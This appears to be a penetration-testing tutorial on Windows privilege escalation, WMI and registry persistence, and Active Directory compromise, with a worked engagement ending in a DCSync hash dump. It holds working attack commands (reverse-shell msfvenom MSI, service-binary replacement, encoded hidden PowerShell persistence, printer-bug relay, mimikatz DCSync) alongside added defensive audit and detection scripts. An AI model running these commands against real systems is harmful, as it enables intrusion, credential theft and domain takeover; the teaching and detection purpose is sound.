Post-Exploitation, Persistence, and Lateral Movement
Privilege Escalation: From Low to High
Post-exploitation begins with the reality that your initial foothold is rarely sufficient. A low-privilege shell on a Windows workstation demands systematic elevation before any meaningful persistence or lateral movement becomes possible. The MITRE ATT&CK framework catalogs these techniques under Privilege Escalation (TA0004), and Windows environments present a rich attack surface.
WinPEAS (Windows Privilege Escalation Awesome Script) remains the standard starting point for automated enumeration. Its color-coded output demands careful interpretation: red indicates immediate exploitability, yellow signals conditions requiring manual verification, and green denotes standard configurations. When WinPEAS flags "Check if you can modify any service registry" in red, it typically reveals a service binary hijacking opportunity.
Consider service binary hijacking: when a Windows service references an executable path with weak permissions, an attacker replaces the legitimate binary with a malicious payload. The following commands identify and exploit this condition:
# Identify services with weak permissions
accesschk.exe -uwcqv "Authenticated Users" *
# Verify specific service path is writable
icacls "C:\Program Files\Vulnerable App\Service.exe"
# Replace binary and restart service
copy /Y C:\temp\reverse_shell.exe "C:\Program Files\Vulnerable App\Service.exe"
sc stop VulnService && sc start VulnService
Unquoted service paths create another classic vector. When a service path contains spaces but lacks quotation marks—such as C:\Program Files\Vulnerable App\Service.exe—Windows interprets the path sequentially, attempting execution at each space boundary: first C:\Program.exe, then C:\Program Files\Vulnerable.exe, and only then the intended binary. An attacker with write access to C:\Program Files places Vulnerable.exe there, intercepting execution before the intended binary is reached.
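To audit this condition from the defender's side, the following added Python example (not from the original page) expands an unquoted ImagePath into the prefixes Windows resolves first and flags those whose parent directory is user-writable; the service names and the writable-directory set are constructed sample data.

```python
import re

# Constructed ImagePath values in the form the Service Control Manager stores
# them (not taken from any real host); the first two reuse the page's paths.
SAMPLE_IMAGE_PATHS = {
    "VulnService": r"C:\Program Files\Vulnerable App\Service.exe",
    "CustomInventoryService": r"C:\Program Files\Custom Software\Inventory Agent\service.exe -config agent.xml",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "QuotedSvc": r'"C:\Program Files\Good App\svc.exe" -k netsvcs',
}

# Constructed result of an ACL check (e.g. icacls) listing directories that
# BUILTIN\Users can write to. Assumption for the example, not real audit data.
USER_WRITABLE_DIRS = {r"C:\Program Files\Custom Software"}

def intercept_candidates(image_path: str) -> list[str]:
    """Return, in the order Windows tries them, the executables that would be
    launched instead of the intended binary when an unquoted path has spaces.
    Quoted paths and paths without spaces are unambiguous and yield []."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    # Only the portion up to the first ".exe" is the binary; the rest is arguments.
    m = re.match(r"(.*?\.exe)", path, re.IGNORECASE)
    exe = m.group(1) if m else path
    tokens = exe.split(" ")
    # Each space boundary yields a shorter prefix that Windows resolves first,
    # appending .exe because the prefix carries no extension.
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]

def exposed_services(image_paths: dict[str, str], writable_dirs: set[str]) -> dict[str, list[str]]:
    """Map service name -> candidate files whose parent directory is user-writable:
    these are the ACLs to tighten, or the ImagePaths that need quoting."""
    findings = {}
    for name, image_path in image_paths.items():
        risky = [c for c in intercept_candidates(image_path)
                 if c.rsplit("\\", 1)[0] in writable_dirs]
        if risky:
            findings[name] = risky
    return findings

if __name__ == "__main__":
    for svc, paths in exposed_services(SAMPLE_IMAGE_PATHS, USER_WRITABLE_DIRS).items():
        print(f"{svc}: quote the ImagePath or restrict write access for {paths}")
```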
AlwaysInstallElevated represents a registry misconfiguration allowing MSI installation with elevated privileges. When both HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated and the corresponding HKCU key equal 1, any user-generated MSI executes as SYSTEM:
# Verify vulnerability exists (both the HKLM and the HKCU key must be set to 1)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Generate malicious MSI with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f msi -o malicious.msi
# Execute with elevated privileges
msiexec /quiet /qn /i C:\temp\malicious.msi
Token abuse techniques—impersonating or stealing access tokens from privileged processes—complete the common escalation vectors. Tools like Incognito (Metasploit) or direct Windows API calls via TokenImpersonation exploit the reality that processes frequently hold tokens representing higher privilege levels than the current user context.
Persistence: Maintaining Access Under Scrutiny
With elevated privileges, establishing persistence (TA0003) becomes critical. However, modern EDR platforms have rendered many traditional techniques alarmingly visible. Scheduled tasks, registry run keys, and WMI event subscriptions each carry distinct detection profiles.
WMI event subscriptions offer superior stealth against signature-based detection by operating entirely within WMI infrastructure, avoiding filesystem or registry artifacts that EDR monitors aggressively:
# Create WMI event filter for persistence
$FilterArgs = @{
EventNamespace = 'root/cimv2'
Name = 'WindowsUpdateFilter'
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
QueryLanguage = 'WQL'
}
# Bind filter to CommandLineEventConsumer executing payload
$ConsumerArgs = @{
Name = 'WindowsUpdateConsumer'
CommandLineTemplate = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -enc <base64_payload>'
}
# Create binding between filter and consumer
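Because these subscriptions live only in WMI, the defender's check is to enumerate root/subscription and resolve each binding. The following added Python example (not part of the original page) does that over a constructed snapshot of __EventFilter, consumer and __FilterToConsumerBinding objects and flags the indicators the persistence above would exhibit.

```python
import re

# Constructed snapshot of the root/subscription namespace, shaped like the
# objects Get-CimInstance returns (not real host output). The first
# filter/consumer pair mirrors the names in the persistence example above;
# the second is the benign default binding present on stock Windows.
FILTERS = [
    {"Name": "WindowsUpdateFilter",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "
              "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240"},
    {"Name": "SCM Event Log Filter", "Query": "select * from MSFT_SCMEventLogEvent"},
]
CONSUMERS = [
    {"Name": "WindowsUpdateConsumer", "Class": "CommandLineEventConsumer",
     "CommandLineTemplate": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -enc <base64_payload>"},
    {"Name": "SCM Event Log Consumer", "Class": "NTEventLogEventConsumer", "CommandLineTemplate": ""},
]
BINDINGS = [
    {"Filter": '__EventFilter.Name="WindowsUpdateFilter"', "Consumer": 'CommandLineEventConsumer.Name="WindowsUpdateConsumer"'},
    {"Filter": '__EventFilter.Name="SCM Event Log Filter"', "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"'},
]

EXEC_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
SUSPICIOUS_CMD = re.compile(r"powershell[^\n]*(-enc\w*\s|-e\s|-windowstyle\s+hidden|-nop|iex|downloadstring)", re.IGNORECASE)
BOOT_TRIGGER = re.compile(r"__InstanceModificationEvent.*SystemUpTime", re.IGNORECASE)

def _name_from_ref(ref):
    m = re.search(r'Name="([^"]+)"', ref)  # '__EventFilter.Name="X"' -> 'X'
    return m.group(1) if m else ref

def suspicious_bindings(filters, consumers, bindings):
    """Resolve every filter->consumer binding and report those showing at least
    one indicator: an executing consumer, hidden/encoded PowerShell, a boot-time trigger."""
    f_by_name = {f["Name"]: f for f in filters}
    c_by_name = {c["Name"]: c for c in consumers}
    report = []
    for b in bindings:
        flt = f_by_name.get(_name_from_ref(b["Filter"]), {})
        con = c_by_name.get(_name_from_ref(b["Consumer"]), {})
        reasons = []
        if con.get("Class") in EXEC_CONSUMERS:
            reasons.append(f"executing consumer ({con['Class']})")
        if SUSPICIOUS_CMD.search(con.get("CommandLineTemplate") or ""):
            reasons.append("hidden/encoded PowerShell in CommandLineTemplate")
        if BOOT_TRIGGER.search(flt.get("Query", "")):
            reasons.append("fires shortly after boot (SystemUpTime trigger)")
        if reasons:
            report.append({"filter": flt.get("Name"), "consumer": con.get("Name"), "reasons": reasons})
    return report
```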
Registry-based persistence remains viable when targeting less-scrutinized locations. Beyond HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, consider WinlogonNotify subkeys, ShellServiceObjects, or Explorer\Browser Helper Objects—each offering execution with varying privilege contexts and visibility profiles.
Active Directory Compromise: BloodHound and Attack Path Mapping
The transition from local compromise to domain control requires understanding Active Directory's graph-based trust relationships. BloodHound transforms raw directory data into a Neo4j graph database, revealing attack paths invisible to linear enumeration tools.
SharpHound, the C# ingestor, collects the necessary data from a compromised endpoint:
# Execute SharpHound with all collection methods
.\SharpHound.exe -c All -d contoso.local --zipfilename contoso.zip
# For low-and-slow collection to avoid detection
.\SharpHound.exe -c DCOnly --stealth
Upload the resulting ZIP to BloodHound's interface. The real power emerges through custom Cypher queries and pre-built analytics. The built-in query "Shortest Paths to Domain Admin" reveals minimal-hop routes from the current node to high-value targets. However, sophisticated engagements demand custom exploration.
Critical node types include:
- User nodes: potential control points when compromised
- Group nodes: transitive membership relationships
- Computer nodes: host compromise enabling further access
- ACL edges: explicit permissions enabling abuse
Worked Example: From Workstation to Domain Compromise
Consider a realistic engagement: initial foothold as CONTOSO\jsmith on workstation WKSTN-42 via phishing payload. The shell operates with standard user privileges.
Phase 1: Local Privilege Escalation
WinPEAS execution reveals an unquoted service path for CustomInventoryService:
╔══════════════════╣ Unquoted Service Paths ╠══════════════════
C:\Program Files\Custom Software\Inventory Agent\service.exe
[...] Permissions: [BUILTIN\Users: W]
The path C:\Program Files\Custom Software is user-writable. We create Inventory.exe that executes our payload, restart the service, and obtain NT AUTHORITY\SYSTEM.
Phase 2: SharpHound Ingestion
With SYSTEM privileges, we execute SharpHound with full collection and exfiltrate the compressed output. BloodHound ingestion reveals the domain graph.
Phase 3: BloodHound Path Analysis
Running "Shortest Paths to Domain Admin" from our compromised WKSTN-42$ computer node reveals:
WKSTN-42 (Computer) → [HasSession] → BACKUP_SVC (User)
BACKUP_SVC → [MemberOf] → Server Operators (Group)
Server Operators → [GenericAll] → DC01 (Computer)
DC01 → [HasSession] → DOMAIN\Administrator
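The same path analysis in plain Python, as an added example that is not part of the original page: the edges above are loaded into a small directed graph, all shortest paths are enumerated, and the edges common to every path are reported as the choke points a defender should remove first; the HELPDESK_USER route is constructed so the comparison has a second path.

```python
from collections import deque

# Edges from the worked example above plus one constructed parallel route
# (HELPDESK_USER) so the choke-point step has paths to compare; not real data.
EDGES = [
    ("WKSTN-42", "HasSession", "BACKUP_SVC"),
    ("BACKUP_SVC", "MemberOf", "Server Operators"),
    ("Server Operators", "GenericAll", "DC01"),
    ("DC01", "HasSession", "Administrator"),
    ("WKSTN-42", "HasSession", "HELPDESK_USER"),       # constructed
    ("HELPDESK_USER", "MemberOf", "Server Operators"),  # constructed
]

def build_graph(edges):
    """Adjacency list: node -> [(relationship, neighbour)]."""
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))
        graph.setdefault(dst, [])
    return graph

def shortest_paths(graph, start, target):
    """BFS returning every shortest path from start to target as a list of
    (src, rel, dst) edges: BloodHound's 'Shortest Paths' idea without Neo4j."""
    best, found = None, []
    queue = deque([(start, [])])
    while queue:
        node, path = queue.popleft()
        if best is not None and len(path) > best:
            break  # FIFO order: every remaining path is at least this long
        if node == target:
            best = len(path)
            found.append(path)
            continue
        visited = {start} | {e[2] for e in path}
        for rel, nxt in graph.get(node, []):
            if nxt not in visited:
                queue.append((nxt, path + [(node, rel, nxt)]))
    return found

def choke_points(paths):
    """Edges shared by every shortest path: fixing one of them (removing the
    ACL, ending the session, pruning the group) breaks all of those paths."""
    if not paths:
        return []
    common = set(paths[0])
    for p in paths[1:]:
        common &= set(p)
    return sorted(common, key=paths[0].index)
```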
However, a parallel query for unconstrained delegation yields a more efficient path. The WEBSERVER$ account shows unconstrained delegation enabled, and our current user jsmith holds GenericWrite permissions against a web application service account that can authenticate to WEBSERVER$.
Phase 4: Exploitation
We leverage the printer bug (MS-RPRN) to force WEBSERVER$ authentication to our controlled listener, capturing its TGT via unconstrained delegation:
# On Kali, invoke printer bug to trigger authentication
python3 printerbug.py contoso.local/jsmith:[email protected] attacker@80/desired-fake-name
# Simultaneously, capture incoming Kerberos ticket
python3 ntlmrelayx.py -t ldap://dc01.contoso.local --delegate-access --escalate-user 'attacker$'
# Export captured TGT and inject for pass-the-ticket
export KRB5CCNAME=/tmp/administrator.ccache
python3 psexec.py -k -no-pass contoso.local/[email protected]
The captured TGT, due to unconstrained delegation, carries forwardable credentials for any service. We perform pass-the-ticket to authenticate as domain administrator without knowing the password hash.
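The defender's counterpart is an audit of userAccountControl, shown here as an added Python example (not from the original page) over constructed directory records: it lists non-DC accounts with unconstrained delegation and the privileged accounts whose TGTs remain forwardable because they lack the NOT_DELEGATED bit.

```python
# userAccountControl bits as documented for Active Directory accounts.
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account
ACCOUNTDISABLE = 0x2

# Constructed records shaped like an LDAP search returning sAMAccountName,
# userAccountControl and memberOf; WEBSERVER$ and jsmith echo the worked
# example, every other entry is invented for the demonstration.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000, "memberOf": []},
    {"sAMAccountName": "WEBSERVER$", "userAccountControl": 0x81000, "memberOf": []},
    {"sAMAccountName": "WKSTN-42$", "userAccountControl": 0x1000, "memberOf": []},
    {"sAMAccountName": "svc_web", "userAccountControl": 0x80200, "memberOf": []},
    {"sAMAccountName": "OLDSRV$", "userAccountControl": 0x81002, "memberOf": []},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200, "memberOf": ["Domain Admins"]},
    {"sAMAccountName": "jsmith", "userAccountControl": 0x200, "memberOf": []},
    {"sAMAccountName": "da_locked", "userAccountControl": 0x100200, "memberOf": ["Domain Admins"]},
]

def unconstrained_delegation_findings(accounts):
    """Accounts holding TRUSTED_FOR_DELEGATION that are not domain controllers.
    Any TGT presented to such a host is cached there and reusable by whoever
    controls it, which is exactly the exposure in the worked example."""
    findings = []
    for acct in accounts:
        uac = acct["userAccountControl"]
        if not uac & TRUSTED_FOR_DELEGATION or uac & SERVER_TRUST_ACCOUNT:
            continue  # DCs legitimately carry the bit; skip them
        findings.append({
            "account": acct["sAMAccountName"],
            "disabled": bool(uac & ACCOUNTDISABLE),
            "user_account": not acct["sAMAccountName"].endswith("$"),
        })
    return findings

def delegation_exposed_admins(accounts, privileged_groups=("Domain Admins",)):
    """Privileged accounts whose TGTs are still forwardable: they lack the
    NOT_DELEGATED bit (membership in Protected Users gives the same protection
    but is not modelled in these constructed records)."""
    return [a["sAMAccountName"] for a in accounts
            if set(a["memberOf"]) & set(privileged_groups)
            and not a["userAccountControl"] & NOT_DELEGATED]
```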
Phase 5: DCSync and Full Domain Compromise
With administrative access to the domain controller, we execute DCSync to replicate all domain hashes:
# Extract all hashes using mimikatz DCSync
lsadump::dcsync /domain:contoso.local /all /csv
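DCSync replication requests are visible in Windows Security event 4662 when Directory Service Access auditing is enabled. The following added Python example (not from the original page) runs that detection over constructed 4662 records, flagging any account outside the replication allowlist that requests the replication control access rights.

```python
import re

# Control access rights a DCSync replication request exercises, keyed by the
# GUIDs that event 4662 records in its Properties field.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.IGNORECASE)

# Constructed 4662 records reduced to the fields the detection needs; the
# Administrator entry is the shape the mimikatz command above would produce.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "Administrator",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jsmith",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},  # ordinary object read
    {"EventID": 4624, "SubjectUserName": "jsmith", "Properties": ""},
]

def replication_rights(properties: str) -> list[str]:
    """Names of the replication rights present in a 4662 Properties string."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]

def detect_dcsync(events, allowlist):
    """4662 events requesting replication rights from any principal other than
    the allowlisted replicators (DC machine accounts, an Entra Connect sync
    account). Requires 'Audit Directory Service Access' to be enabled."""
    allowed = {a.upper() for a in allowlist}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if rights and ev["SubjectUserName"].upper() not in allowed:
            hits.append({"account": ev["SubjectUserName"], "rights": rights})
    return hits

if __name__ == "__main__":
    for hit in detect_dcsync(SAMPLE_EVENTS, ["DC01$", "DC02$"]):
        print(f"possible DCSync by {hit['account']}: {', '.join(hit['rights'])}")
```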
Detection Realities and Tester Methodology
Modern EDR platforms detect most described techniques. Process injection, LSASS access, credential dumping, and anomalous Kerberos traffic generate high-fidelity alerts. This detection capability fundamentally shapes methodology.
For testers, this means:
- Living-off-the-land binaries (LOLBins) reduce signature detection but behavioral analytics still flag anomalous execution chains
- EDR blind spots exist in native utilities and expected administrative patterns—understanding normal baseline activity becomes essential
- Timing and rate considerations: aggressive execution triggers automated response; measured, patient progression mimics legitimate administration
The engagement's value lies not in technique novelty but in demonstrating business impact: from phishing email to domain control, documenting each control failure that enabled progression. BloodHound's visual paths translate technical compromise into executive-understandable risk representation—the unconstrained delegation that permitted ticket capture, the excessive permissions that enabled delegation abuse, the missing EDR coverage that delayed detection.
Effective post-exploitation documentation articulates not merely what was compromised, but what organizational decisions created the pathway, enabling prioritized remediation that genuinely reduces future exposure.